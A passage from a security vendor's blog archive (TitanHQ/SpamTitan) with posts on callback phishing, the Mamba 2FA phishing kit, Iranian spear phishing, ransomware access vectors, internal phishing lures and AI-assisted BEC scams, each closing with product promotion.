threat, the severity of\r\nany compromise can be limited. With TitanHQ’s SafeTitan solution, it is easy to create and automate tailored\r\ntraining courses and phishing simulations that have been shown to be highly effective at reducing susceptibility to\r\nphishing and other threats.\r\nSince threat actors most commonly target employees via email, it is important to have robust email defenses to\r\nprevent the threats from reaching employees. Advanced anti-spam services such as SpamTitan incorporate a wide\r\nrange of threat detection methods to block more threats, including reputation checks, extensive message analysis,\r\nmachine-learning-based detection, antivirus scans, and email sandboxing for malware detection.  SpamTitan has\r\nbeen shown to block more than 99.99% of phishing threats and 100% of malware.\r\nTOAD Attacks: New Voice-Based Phishing Techniques Used in Attacks on\r\nBusinesses\r\nby G Hunt | October 24, 2024 | Phishing \u0026 Email Spam\r\nPhishing is one of the most effective methods used by cyber actors to gain initial access to protected networks\r\nPhishing tactics are evolving and TOAD attacks now pose a significant threat to businesses. TOAD stands for\r\nTelephone-Oriented Attack Delivery and is a relatively new and dangerous form of phishing that involves a\r\ntelephone call, although there are often several different elements to a TOAD attack which may include initial\r\ncontact via email, SMS messages, or instant messaging services.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 46 of 136\n\nTOAD attacks often start with an information-gathering phase, where the attacker obtains personal information\r\nabout individuals that can then be targeted. That information may only be a mobile phone number or an email\r\naddress, although further information is required to conduct some types of TOAD attacks.\r\nOne of the most common types of TOAD attacks is callback phishing. The attacker impersonates a trusted entity\r\nin an email and makes a seemingly legitimate request to make contact. There is a sense of urgency to get the\r\ntargeted individual to take prompt action. Rather than use a hyperlink in the message to direct the user to a\r\nwebsite, the next phase of the attack takes place over the telephone or a VOIP-based service such as WhatsApp. A\r\nphone number is included that must be called to resolve a problem.\r\nIf the call is made, the threat actor answers and during the call, trust is built with the caller and the threat actor\r\nmakes their request. That could be an instruction to visit a website where sensitive information must be entered or\r\na file must be downloaded. That file download leads to a malware infection.\r\nSeveral TOAD attacks have involved the installation of legitimate remote access software. One campaign\r\ninvolved initial contact via email about an expensive subscription that was about to be renewed, which required a\r\ncall to cancel. The threat actor convinces the user to download remote access software which they are told is\r\nnecessary to prevent the charge being applied, such as to fully remove the software solution from the user’s\r\ndevice.\r\nThe user is convinced to give the threat actor access to their device through the software and the threat actor keeps\r\nthe person on the line while they install malware or perform other malicious actions, reassuring them if they get\r\nsuspicious.  Other scams involve initial contact about a fictitious purchase that has been made, or a bank scam,\r\nwhere an email impersonates a bank and warns the victim that an account has been opened in their name or a large\r\ncharge is pending. These attacks result in the victim providing the threat actor with the information they need to\r\naccess their account.\r\nTOAD attacks often involve the impersonation of a trusted individual, who may be a colleague, client, or even a\r\nfamily member. Since information is gathered before the scam begins, when the call is made, the threat actor can\r\nprovide that information to the victim to convince them that they are who they claim to be. That information may\r\nhave been purchased on the dark web or obtained in a previous data breach. For instance, following a healthcare\r\ndata breach, the healthcare provider may be impersonated, and the attacker can provide medical information in\r\ntheir possession to convince the victim that they work at the hospital.\r\nThe use of AI tools makes these scams even more convincing. Deepfakes are used, where a person’s voice is\r\nmimicked, or video images are manipulated on video conferencing platforms. Deepfakes were used in a scam on\r\nan executive in Hong Kong, who was convinced to transfer around £20 million in company funds to the attacker’s\r\naccount, believing they were communicating with a trusted individual via a video conferencing platform.\r\nTOAD attacks may be solely conducted over the phone, where the attacker uses call spoofing to manipulate the\r\ncaller ID to make it appear that the call is coming from a known and previously verified number. Other methods\r\nmay be used to convince the victim that the reason for the call is genuine, such as conducting a denial-of-service\r\nattack to disrupt a service or device to convince the user that there is an urgent IT problem that needs to be\r\nresolved. TOAD attacks are increasing because standard phishing attacks on businesses are becoming harder to\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 47 of 136\n\npull off due to email security solutions, multifactor authentication, and improved user awareness about scam\r\nmessages.\r\nUnfortunately, there is no single cybersecurity solution or method that can combat these threats. A comprehensive\r\nstrategy is required that combines technical measures, security awareness training and administrative\r\ncontrols. Advanced anti-spam software with machine learning and AI-based detection can identify the emails that\r\nare used for initial contact. These advanced detection capabilities are needed because the initial emails often\r\ncontain no malicious content, other than a phone number. SpamTitan, TitanHQ’s cloud-based anti-spam service,\r\ncan detect these initial emails through reputation checks on the sender’s IP address, email account, and domain,\r\nand machine learning is used to analyze the message content, including comparing emails against the typical\r\nmessages received by a business.\r\nWebTitan is a cloud-based DNS filter that is used to control the web content that users can access. WebTitan will\r\nblock access to known malicious sites and can be configured to prevent certain file types from being downloaded\r\nfrom the internet, such as those commonly used to install malware, unauthorized apps, and remote access\r\nsolutions.\r\nRegular security awareness training is a must. All members of the workforce should be provided with regular\r\nsecurity awareness training and TOAD attacks should feature in the training content. SafeTitan, TitanHQ’s\r\nsecurity awareness training platform and phishing simulator, makes it easy for businesses to create and automate\r\ntraining courses for the workforce. Employees should be trained in how to identify a TOAD attack, told not to\r\ntrust caller ID alone, to avoid clicking links in emails and SMS messages, and to be vigilant when receiving or\r\nmaking calls, and to report any suspicious activity and immediately end a call if something does not seem right.\r\nMamba 2FA Phishing Kit Used to Bypass MFA on Microsoft 365 Accounts\r\nby G Hunt | October 20, 2024 | Phishing \u0026 Email Spam\r\nResearchers have identified a new phishing kit that is being used to steal credentials for Microsoft 365 accounts\r\nand gain access to accounts protected by multi-factor authentication (MFA). The phishing kit, called Mamba 2FA\r\nis a cause of concern as it has the potential to be widely adopted given its relatively low price and there are signs it\r\nis proving popular with cybercriminals since its release in late 2023. Phishing kits make it easy for low-skilled\r\ncybercriminals to conduct sophisticated attacks as they provide all the tools required to breach accounts. The\r\nMamba 2FA kit includes the necessary infrastructure to conduct phishing campaigns, masks IP addresses to\r\nprevent them from being blocked, and updates the phishing URLs frequently to ensure they remain active and are\r\nnot blocked by security solutions.\r\nThe Mamba 2FA kit includes phishing pages that mimic Microsoft services such as OneDrive and SharePoint, and\r\nthe pages can be customized to create realistic phishing URLs for targeting businesses, including allowing the\r\nbusiness logo and background images to be added to the login page. Since businesses often have MFA enabled,\r\nsimply stealing Microsoft credentials is not sufficient, as the MFA will block any attempt to use the credentials for\r\nunauthorized access. Like several other popular phishing kits, the Mamba 2FA kit supports adversary-in-the-middle (AitM) attacks, incorporating proxy relays to steal one-time passcodes and authentication cookies in real\r\ntime. When credentials are entered into the phishing page, they are relayed to Microsoft’s servers in real-time and\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 48 of 136\n\nMicrosoft’s responses are relayed back to the victim, including MFA prompts, which allows the threat actor to\r\nsteal the session cookie and gain access to the user’s account.\r\nPhishing kits such as Mamba 2FA pose a serious threat to businesses, which should take steps to protect against\r\nattacks. The AitM tactics can defeat less secure forms of MFA that are based on one-time passwords but are not\r\neffective against hardware-based MFA. Implementing phishing-resistant MFA will ensure these attacks do not\r\nsucceed. Other recommended controls include geo-blocking and allowlisting for IPs and devices. While these\r\nadvanced phishing kits are effective, threat actors must convince people to click a link in an email and disclose\r\ntheir login credentials, and with advanced email security solutions these phishing threats can be identified and\r\nblocked before they reach inboxes. Training should also be provided to the workforce to help with the\r\nidentification and avoidance of phishing.\r\nTitanHQ can help through the SpamTitan cloud-based spam filtering service and the SafeTitan security awareness\r\ntraining and phishing simulation platform. SpamTitan incorporates reputation checks, Bayesian analysis,\r\ngreylisting, machine learning-based detection, antivirus scans, and email sandboxing to block phishing and\r\nmalware threats. Independent tests demonstrated SpamTitan was one of the best spam filtering solutions for\r\nbusinesses at blocking threats, with a 99.99% phishing block rate and a 100% malware block rate.\r\nThe SafeTitan security awareness training platform makes it easy for businesses to provide regular cybersecurity\r\nawareness training. The platform includes more than 80 training modules, videos, and webinars, with hundreds of\r\nphishing simulation templates based on real-world phishing examples. Regular training and phishing simulations\r\nhave been proven to be highly effective at reducing susceptibility to phishing and other threats targeting\r\nemployees. This month, TitanHQ has also launched its security awareness training platform for MSPs, which has\r\nbeen specifically developed to make it quick and easy for MSPs to incorporate security awareness training into\r\ntheir service stacks. Speak with TitanHQ today for more information about these and other cybersecurity solutions\r\nfor combatting the full range of cyber threats.\r\nCyber Actors Conducting Spear Phishing Campaigns for Iranian State\r\nby G Hunt | September 30, 2024 | Internet Security, Network Security\r\nSpear phishing attacks are being conducted by a cyber threat group working on behalf of Iran’s Islamic\r\nRevolutionary Guard Corps. The cyber threat actors have been gaining access to the personal and business\r\naccounts of targeted individuals to obtain information to support Iran’s information operations.\r\nAccording to a joint cybersecurity advisory issued by the Federal Bureau of Investigation (FBI), U.S. Cyber\r\nCommand – Cyber National Mission Force (CNMF), the Department of the Treasury (Treasury), and the United\r\nKingdom’s National Cyber Security Centre (NCSC), the campaign has been targeting individuals with a nexus to\r\nIranian and Middle Eastern affairs, including journalists, political activists, government officials, think tank\r\npersonnel, and individuals associated with US political campaign activity.\r\nIndividuals are typically contacted via email or messaging platforms. As is common in spear phishing attacks, the\r\ncyber threat actors impersonate trusted contacts, who may be colleagues, associates, acquaintances, or family\r\nmembers. In some of the group’s attacks, they have impersonated known email service providers, well-known\r\njournalists seeking interviews, contacts offering invitations to conferences or embassy events, or individuals\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 49 of 136\n\noffering speaking engagements. There have been instances where an individual is impersonated who is seeking\r\nforeign policy discussions and opinions.\r\nIn contrast to standard phishing attacks where the victim is sent a malicious email attachment or link to a phishing\r\nwebsite in the initial email, more effort is put into building a rapport with the victim to make them believe they are\r\nengaging with the person the scammer is impersonating. There may be several exchanges via email or a\r\nmessaging platform before the victim is sent a malicious link, which may be embedded in a shared document\r\nrather than being directly communicated via email or a messaging app.\r\nIf the link is clicked, the victim is directed to a fake email account login page where they are tricked into\r\ndisclosing their credentials. If entered, the credentials are captured and used to login to the victim’s account. If the\r\nvictim’s account is protected with multi-factor authentication, they may also be tricked into disclosing MFA codes.\r\nIf access to the account is gained, the cyber threat actor can exfiltrate messages and attachments, set up email\r\nforwarding rules, delete or manipulate messages, and use the account to target other individuals of interest.\r\nSpear phishing attempts are harder to identify than standard phishing attempts as greater effort is put in by the\r\nattackers, including personalizing the initial contact messages, engaging in conversations spanning several\r\nmessages, and using highly plausible and carefully crafted lures. These emails may bypass standard spam filtering\r\nmechanisms since the emails are not sent in mass campaigns and the IP addresses and domains used may not have\r\nbeen added to blacklists.\r\nIt is important to have robust anti-phishing, anti-spam, and anti-spoofing solutions in place to increase protection\r\nand prevent these malicious emails from reaching their intended targets. An advanced spam filtering solution\r\nshould be used that incorporates Sender Policy Framework (SPF), DomainKeys Identified Mail (DKIM), and\r\nDomain-based Message Authentication Reporting and Conformance (DMARC) to identify spoofing and validate\r\ninbound emails. SpamTitan also incorporates machine learning and AI-based detection to help identify spear\r\nphishing attempts.\r\nIf you are a Microsoft 365 user, the anti-spam and anti-phishing mechanisms provided by Microsoft should be\r\naugmented with a third-party anti-phishing solution. PhishTitan can detect the spear phishing emails that\r\nMicrosoft’s EOP and Defender often miss while adding a host of detection mechanisms and anti-phishing features\r\nincluding adding banners to emails from external sources.\r\nOne of the main defenses against these attacks is vigilance. An end-user security awareness training program\r\nshould be implemented to improve awareness of spear phishing attacks. SafeTitan makes this as easy as possible\r\nand covers all possible attack scenarios, with training provided in short and easy-to-assimilate training modules. It\r\nis also important to conduct phishing simulations to raise and maintain awareness. These simulations can be\r\nespecially effective at raising awareness about spear phishing emails and giving end users practice at identifying\r\nthese threats.\r\nMultifactor authentication should be enabled on all accounts, with phishing-resistant multi-factor authentication\r\nproviding the highest degree of protection. IT teams should also consider prohibiting email forwarding rules from\r\nautomatically forwarding emails to external addresses and conducting regular scans of the company email server\r\nto identify any custom rules that have been set up or changes to the configuration. Alerts should also be\r\nconfigured for any suspicious activity such as logins from foreign IP addresses.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 50 of 136\n\nSchool Cyberattacks Increase 55% with Phishing Attacks the Most Common\r\nThreat\r\nby G Hunt | September 30, 2024 | Security Awareness\r\nWhile no sector is immune to cyberattacks, some sectors are targeted more frequently than others and attacks on\r\nthe education sector are common and on the rise. In May 2024, new data released by the UK’s Information\r\nCommissioner’s Office revealed there had been 347 cyber incidents reported by the education and childcare sector\r\nin 2023, an increase of 55% from the previous year.\r\nThese attacks can prevent access to IT systems, forcing schools to resort to manual processes for checking pupil\r\nregisters, teaching, and all other school functions. Without access to IT systems, teachers are unable to prepare for\r\nlessons, schools have been prevented from taking payment for pupil lunches, and many have lost students’\r\ncoursework. The impact on schools, teachers, and students can be severe. Some schools have been forced to\r\ntemporarily close due to a cyberattack.\r\nA survey conducted by the Office of Qualifications and Examinations Regulation (Ofqual) found that 9% of\r\nsurveyed headteachers had experienced a critically damaging cyberattack in the past academic year. 20% of\r\nschools were unable to immediately recover from a cyberattack and 4% reported that they still had not returned to\r\nnormal operations more than half a term later.\r\nThe Ofqual survey revealed more than one-third of English schools had suffered a cyber incident in the past\r\nacademic year and a significant percentage faced ongoing disruption due to a cyberattack. Cyberattacks can take\r\nmany forms and while ransomware attacks are often the most damaging, the most common type of cyber incident\r\nis phishing. According to the survey, 23% of schools and colleges in England experienced a cybersecurity incident\r\nas a result of a phishing attack in the past year.\r\nSchools are not sufficiently prepared to deal with these attacks. According to the survey, 1 in 3 teachers said they\r\nhad not been provided with cybersecurity training in the past year, even though cybersecurity training has proven\r\nto be effective at preventing cyberattacks. The survey revealed that out of the 66% of teachers who had been\r\nprovided with training, two-thirds said it was useful.\r\nTitanHQ has developed a comprehensive security awareness training platform for all sectors, that is easy to tailor\r\nto meet the needs of individual schools. The platform includes an extensive range of computer-based training\r\ncontent, split into modules of no more than 10 minutes to make it easy for teachers and other staff members to\r\ncomplete. The training material is enjoyable, covers the specific threats that educational institutions face, and\r\nteaches the cybersecurity practices that can help to improve defenses and combat phishing, spear phishing, and\r\nmalware attacks.\r\nThe SafeTitan platform also includes a phishing simulator for conducting simulated phishing attacks to improve\r\nawareness, reinforce training, and give staff members practice in identifying phishing and other cyber threats. The\r\ntraining and simulations can be automated, and training modules can be set to be triggered by security errors and\r\nrisky behaviors. Further, the platform is affordable.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 51 of 136\n\nTo find out more about improving human defenses at your educational institution through SafeTitan, give the\r\nTitanHQ team a call. TitanHQ can also help with improving technical defenses, with a suite of cybersecurity\r\nsolutions for the education sector including SpamTitan anti-spam software, the PhishTitan anti-phishing solution,\r\nand the WebTitan DNS-based web filter. Combined, these technical defenses can greatly improve your security\r\nposture and prevent cyber threats them from reaching end users and their devices.\r\nRansomware Attacks Often Start with Malware Infections or Phishing Attacks\r\nby G Hunt | September 15, 2024 | Network Security\r\nRansomware attacks can cause an incredible amount of damage to an organization’s reputation as well as huge\r\nfinancial losses from the downtime they cause. Recovery from an attack, regardless of whether the ransom is paid,\r\ncan take weeks and the theft and publication of sensitive data on the dark web can prompt customers to leave in\r\ntheir droves. Attacks are still being conducted in high numbers, especially in the United States and the United\r\nKingdom. One recent survey indicates that 90% of businesses in those countries have experienced at least one\r\nattack in the past 12 months, with three-quarters of organizations suffering more than one attack in the past year.\r\nThe healthcare sector is often attacked as defenses are perceived to be weak and sensitive data can be easily\r\nstolen, increasing the chance of the ransom being paid. The Inc Ransom group has been targeting the healthcare\r\nsector and conducted an attack on an NHS Trust in Scotland earlier this year, stealing 3 TB of sensitive data and\r\nsubsequently publishing that data on the dark web when the ransom wasn’t paid.\r\nThe Inc Ransom group also conducted an attack on a Michigan healthcare provider, preventing access to its\r\nelectronic medical record system for 3 weeks in August. A group called Qilin attacked an NHS pathology\r\nprovider, Synnovis, in June 2024 which had a huge impact on patient services, causing a shortage of blood in\r\nLondon hospitals that caused many surgeries to be postponed. Education is another commonly attacked sector.\r\nThe Billericay School in Essex had its IT system encrypted, forcing the school to temporarily close. In all of these\r\nattacks, highly sensitive data was stolen and held to ransom. The public sector, healthcare, and schools are\r\nattractive targets due to the value of the sensitive data they hold, and attacks on businesses cause incredibly costly\r\ndowntime, both of which can force victims into paying ransoms. What is clear from the reporting of attacks is no\r\nsector is immune.\r\nThere is increasing evidence that ransomware groups are relying on malware for initial access. Microsoft recently\r\nreported that a threat actor tracked as Vanilla Tempest (aka Vice Society) that targets the healthcare and education\r\nsectors has started using Inc ransomware in its attacks and uses the Gootloader malware downloader for initial\r\naccess. A threat actor tracked as Storm-0494 is responsible for the Gootloader infections and sells access to the\r\nransomware group. Infostealer malware is also commonly used in attack chains. The malware is installed by threat\r\ngroups that act as initial access brokers, allowing them to steal credentials to gain access to networks and then sell\r\nthat access to ransomware groups. Phishing is also commonly used for initial access and is one of the main initial\r\naccess vectors in ransomware attacks, providing access in around one-quarter of attacks.\r\nInfostealer malware is often able to evade antivirus solutions and is either delivered via malicious websites, drive-by malware downloads, or phishing emails. Gootloader infections primarily occur via malicious websites, with\r\nmalvertising used to direct users to malicious sites where they are tricked into downloading and installing\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 52 of 136\n\nmalware. Credentials are commonly compromised in phishing attacks, with employees tricked into disclosing\r\ntheir passwords by impersonating trusted individuals and companies.\r\nAdvanced cybersecurity defenses are needed to combat these damaging cyberattacks. In addition to traditional\r\nantivirus software, businesses need to implement defenses capable of identifying the novel malware threats that\r\nantivirus software is unable to detect. One of the best defenses is an email sandbox, where emails are sent for\r\nbehavioral analysis. In the sandbox – an isolated, safe environment – file attachments are executed, and their\r\nbehavior is analyzed, rather than relying on malware signatures for detection, and links are followed to identify\r\nmalicious content.\r\nDNS filters are valuable tools for blocking web-based delivery of malware. They can be used to control access to\r\nthe Internet, prevent malvertising redirects to malicious websites, block downloads of dangerous file types from\r\nthe Internet, and access to known malicious URLs. Employees are tricked into taking actions that provide\r\nattackers with access to their networks, by installing malware or disclosing their credentials in phishing attacks, so\r\nregular security awareness training is important along with tests of knowledge using phishing simulations.\r\nThere is unfortunately no silver bullet when it comes to stopping ransomware attacks; however, that does not\r\nmean protecting against ransomware attacks is difficult for businesses. TitanHQ offers a suite of easy-to-use\r\ncybersecurity solutions that provide cutting-edge protection against ransomware attacks. TitanHQ’s award-winning products combine advanced detection such as email sandboxing, AI and machine-learning-based\r\ndetection, and are fed threat intelligence from a massive global network of endpoints to ensure businesses are well\r\nprotected from the full range of threats.\r\nGive the TitanHQ team a call today and have a chat about improving your defenses with advanced anti-spam\r\nsoftware, anti-phishing protection, DNS filtering, and security awareness training solutions and put the solutions\r\nto the test on a free trial to see for yourself the difference they make.\r\nIs Your Business Protected Against Internal Phishing Attempts?\r\nby G Hunt | August 29, 2024 | Phishing \u0026 Email Spam, Security Awareness\r\nIf a phishing attempt is successful and a threat actor gains access to an employee’s email account, it is common for\r\nthe compromised email account to be used for internal phishing. Some malware variants also allow threat actors to\r\nhijack email accounts and send malware internally, adding a copy of the malware to a message thread to make it\r\nappear that a file was attached in response to a past email conversation.\r\nThere are several different scenarios where these types of attacks will occur such as business email compromise\r\nattacks to gain access to an email account that can be used for the scam – a CEO, executive, HR, or IT department\r\naccount for example; to distribute malware extensively to compromise as many accounts as possible; to gain\r\naccess to multiple email accounts, or to compromise multiple accounts to gain access to sensitive data.\r\nIn industries where data breach reporting is mandatory, such as in healthcare in the United States, email account\r\nbreaches are regularly reported where unauthorized activity is detected in a single email account, and the\r\nsubsequent investigation reveals multiple employee email accounts have been compromised through internal\r\nphishing.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 53 of 136\n\nInternal phishing attempts are much harder to identify than phishing attempts from external email accounts. Even\r\nwhen email security solutions incorporate outbound scanning, these phishing attempts are often not recognized as\r\nmalicious as the emails are sent from a trusted account. The recipients of these emails are also much more likely\r\nto trust an internal email than an external email from an unknown sender and open the email, click a link, or open\r\na shared file.\r\nAttackers may also spoof an internal email account. It is easy to find out the format used by a company for their\r\nemails, and names can be found on professional networking sites. A good email security solution should be able to\r\nidentify these spoofed emails, but if they arrive in an inbox, an employee may be fooled into thinking that the\r\nemail is a genuine internal email.\r\nIt is important for businesses to take steps to combat internal phishing as it is a common weak point in email\r\ndefenses. Unfortunately, there is no single technical control that can protect against these phishing attempts. What\r\nis required is a combination of measures to provide layered protection. With layered security, if one measure fails\r\nto protect against a threat, others are in places that can thwart the attempt.\r\nThe best place to start is with a technical measure to identify and block these phishing threats. Spam filter\r\nsoftware naturally needs to have inbound as well as outbound scanning; however, standard checks such as\r\nreputation scans are not enough. An email security solution should have AI and machine learning capabilities for\r\nassessing how emails deviate from standard emails sent internally and for in-depth analysis of message content.\r\nLink scanning is also important, with URL rewriting to identify the true destination of embedded URLs, OLE\r\ndetection, and email sandboxing to identify malicious attachments – not just malware but also malicious links in\r\nemail attachments.\r\nSecurity awareness training is vital as employees may not be aware of threats they are likely to encounter. Security\r\nawareness training should include internal phishing and employees should be made aware that they should not\r\nautomatically trust internal emails as they may not be what they seem. Security awareness training should be\r\naccompanied by phishing simulations, including simulated phishing attempts from internal email accounts.  These\r\nwill give employees practice in identifying phishing and security teams will learn how susceptible the workforce\r\nis and can then take steps to address the problem.\r\nMulti-factor authentication is required. If a phishing attempt is not identified by either a security solution or the\r\nemployee, and the employee responds and divulges their credentials, they can be used by the threat actor to access\r\nthe employee’s email account. Multi-factor authentication protects against this by requiring another factor – in\r\naddition to a password – to be provided. The most robust form of MFA is phishing-resistant MFA, although any\r\nform of MFA is better than none.\r\nTitanHQ can help protect against phishing attacks of all types through the SpamTitan cloud-based spam filtering\r\nservice, the PhishTitan anti-phishing solution for M365, and the SafeTitan Security awareness training and\r\nphishing simulation platform.\r\nThe engine that powers SpamTitan and PhishTitan has an exceptional phishing catch rate, including internal\r\nphishing attempts. The engine incorporates AI- and machine learning algorithms that can detect novel phishing\r\nattempts and emails that deviate from the normal emails sent internally, as well as OLE detection, URL rewriting,\r\nand email sandboxing for catching novel malware and phishing threats.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 54 of 136\n\nThe SafeTitan Security awareness training platform includes an extensive library of training content to teach\r\nsecurity best practices, eradicate risky behaviors, and train employees on how to recognize an extensive range of\r\nthreats. The phishing simulator makes it easy to conduct internal phishing tests on employees to test knowledge\r\nand give employees practice at identifying email threats. Usage data shows the platform can reduce employee\r\nsusceptibility to phishing attempts by up to 80%.\r\nFor more information about improving your phishing defenses, speak with TitanHQ today.\r\nCommon Phishing Examples That Employees Fall For\r\nby G Hunt | August 28, 2024 | Spam Software\r\nPhishing is the name given to a type of cyberattack where the threat actor uses deception to trick an individual into\r\ntaking an action that benefits the threat actor. A lure is used to get the targeted individual to respond and these\r\nattacks typically create a sense of urgency. Urgency is required as phishers need users to act quickly rather than\r\nstop and think about the request. The faster the response, the less time there is to identify the scam for what it is.\r\nThere is often a threat to help create a sense of urgency, such as negative consequences if no action is taken.\r\nPhishing can take place over the phone, SMS, and instant messaging platforms, but email is the most common\r\nway of getting the phishing lure in front of an employee. It is now common for businesses to provide security\r\nawareness training to the workforce to raise awareness of phishing threats and to have a spam email filter in place\r\nto detect and quarantine these malicious emails before they reach inboxes; however, even with robust defenses in\r\nplace, some malicious emails will arrive in inboxes and employees are often tricked into responding.\r\nSecurity awareness training programs teach employees to stop and think before taking any request in an email,\r\nwhich is the last thing phishers want the recipients of their emails to do. One of the ways they can get a quick\r\nresponse is to make the recipient believe that the email has been sent from an internal email account, either\r\nthrough spoofing or by using a compromised internal email account. Some of the lures used in phishing attempts\r\nthat the majority of employees will at least open and read, are detailed below.\r\nHR Themed Phishing Emails\r\nOne of the ways that phishers increase the chance of a user responding is to use Human Resources (HR)-themed\r\nlure, as any communication from the HR department is usually taken seriously by employees. These phishing\r\nattempts include the types of notifications that HR departments often send via email, examples of which include:\r\nChanges to working hours\r\nUpdates to working practices\r\nDress code changes\r\nUpcoming training/cybersecurity training sessions\r\nAnnual leave notifications\r\nPayroll information requests\r\nTax matters\r\nHealthcare and wellness benefit updates\r\nEmployee rewards programs\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 55 of 136\n\nNotifications about disciplinary procedures\r\nIT Department Notifications\r\nNotifications from the IT department are also common as employees typically open these emails and act quickly.\r\nThese include:\r\nInternet activity reports\r\nSecurity alerts\r\nThe discovery of unauthorized software\r\nChanges to access rights\r\nRequires software installations\r\nNotifications from Board Members\r\nPhishers often impersonate the CEO or other executives, as they know that employees will want to respond\r\nquickly and are unlikely to question requests from these authority figures. CEOs are commonly impersonated in\r\nbusiness email compromise attacks, where the threat actor tries to get an employee to make a wire transfer to their\r\naccount, purchase gift cards, or divulge sensitive information. These emails may include a hyperlink to a website\r\nwhere the user is told they must enter their login credentials, a hyperlink to a website where a file download takes\r\nplace, or the emails may include an attachment. Common file types used in these email campaigns include PDF\r\nfiles, HTML attachments, Office files, and compressed files. These files may contain malware or malicious\r\nscripts, or may be used to hide information from spam filtering software. For example, PDF files are commonly\r\nused that contain malicious links. By adding the link to the PDF file, there is less chance that spam filtering\r\nsoftware will find and follow the link.\r\nHow to Defend Against These Common Email Threats\r\nDefending against email attacks requires advanced anti spam software and regular security awareness training for\r\nthe workforce.  SpamTitan from TitanHQ is an advanced cloud-based anti-spam service that performs\r\ncomprehensive checks for spam and malicious emails, including an inbound spam filter and outbound filtering\r\nwith data loss prevention. SpamTitan performs reputation checks of the sender’s domain and email account,\r\nrecipient verification, anti-spoofing checks, and alias recognition, and allows geoblocking to prevent the delivery\r\nof emails from certain locations (overseas, for instance).\r\nSpamTitan also incorporates extensive content filtering mechanisms, including rewriting URLs to identify the true\r\ndestination, URL checks to identify malicious content, anti-phishing measures including machine learning\r\nalgorithms to detect suspicious content that deviates from the standard emails typically received, Bayesian\r\nanalysis to identify spam and phishing, OLE detection, dual antivirus engines, and email sandboxing. Sandboxing\r\nis key to blocking malware threats, including previously unseen malware. With SpamTitan in place, the vast\r\nmajority of threats will not arrive in inboxes. In recent independent tests, SpamTitan had a 99.99% spam detection\r\nrate, a 99.98% phishing detection rate, and a 100% malware detection rate, with zero false positives.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 56 of 136\n\nTitanHQ also offers a comprehensive security awareness training platform called SafeTitan. SafeTitan makes it\r\neasy for businesses to create and automate security awareness training programs for the workforce, and tailor\r\nprograms for different departments and user groups. The content is fun and engaging and is delivered in modules\r\nof more than 10 minutes, which makes security awareness training easy to fit into busy workflows. SafeTitan also\r\nincludes a phishing simulator for assessing the effectiveness of training and for giving employees practice at\r\nidentifying phishing attempts, including the types of phishing attempts mentioned in this article that often fool\r\nemployees.\r\nSpamTitan and SafeTitan, like all TitanHQ solutions, are easy to implement, use, and maintain, and are available\r\non a free trial. For advice on improving cybersecurity at your business and for further information on TitanHQ\r\nsolutions, call the team today and take the first step toward improving your security posture.\r\nAI Tools Increasingly Used for BEC/VEC Attacks\r\nby G Hunt | August 27, 2024 | Phishing \u0026 Email Spam, Security Awareness\r\nBusiness email compromise (BEC) and vendor email compromise (VEC) attacks can result in huge financial\r\nlosses that can prove catastrophic for businesses, and these attacks are being conducted with increasing regularity.\r\nBEC and VEC attacks have their roots in phishing and often involve phishing as the first stage of the attack. These\r\nattacks involve impersonation of a trusted person through spoofed or compromised email accounts. The attacker\r\nthen tricks the targeted individual into disclosing sensitive information or making a fraudulent wire transfer. In the\r\ncase of the latter, the losses can be considerable. A company employee at Orion, a Luxembourg carbon black\r\nsupplier, resulted in fraudulent transfers of $60 million. The employee was tricked into believing he was\r\nconversing with a trusted vendor and made multiple fraudulent transfers to the attacker’s account.\r\nBEC and VEC attacks are among the most difficult email threats to detect, as they often use legitimate, trusted\r\nemail accounts so the recipient of the email is unaware that they are conversing with a scammer. Since the attacker\r\noften has access to emails, they will be aware of confidential information that no other individual other than the\r\ngenuine account holder should know. The attacker can also check past emails between the account holder and the\r\nvictim and can mimic the writing style of the account holder. These attacks can be almost impossible for humans\r\nto distinguish from genuine communications. Scammers often reply to existing email threads, which makes these\r\nscams even more believable.\r\nBEC/VEC scammers are increasingly turning to AI tools to improve their attacks and AI tools make these scams\r\neven harder for humans and email security solutions to identify.  AI tools can be fed past emails between two\r\nindividuals and told to create a new email by mimicking the writing style, resulting in perfect emails that could\r\nfool even the most security-aware individual.\r\nSome of the most convincing VEC attacks involve the use of compromised email accounts. The attacker gains\r\naccess to the account through phishing or stolen credentials and searches through the account for information of\r\ninterest that can be used in the scam. By searching through sent and stored emails, they can identify the vendor’s\r\nclients and identify targets. They are then sent payment requests for fake invoices, or requests are made to change\r\nthe bank account information for genuine upcoming payments.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 57 of 136\n\nDue to the difficulty of identifying these threats, a variety of measures should be implemented to improve\r\ndefenses, including administrative and technical controls, as well as employee training. In order to beat AI tools,\r\nnetwork defenders need to adopt AI themselves, and should implement a spam filter with AI and machine learning\r\ncapabilities, such as the SpamTitan cloud-based spam filtering service.\r\nSpamTitan analyzes the genuine emails received by the company to create a baseline against which other emails\r\ncan be measured. Through machine learning, Bayesian analysis, and other content checks, SpamTitan is able to\r\nidentify the signs of BEC/VEC and alert end users when emails deviate from the norm. An anti-phishing solution\r\nis also strongly recommended to protect accounts against initial compromise and to raise awareness of potential\r\nthreats. PhishTitan from TitanHQ incorporates cutting-edge threat detection with email banners warning about\r\nexternal emails and other threats and allows IT teams to rapidly remediate any attacks in progress.\r\nSecurity awareness training is essential for 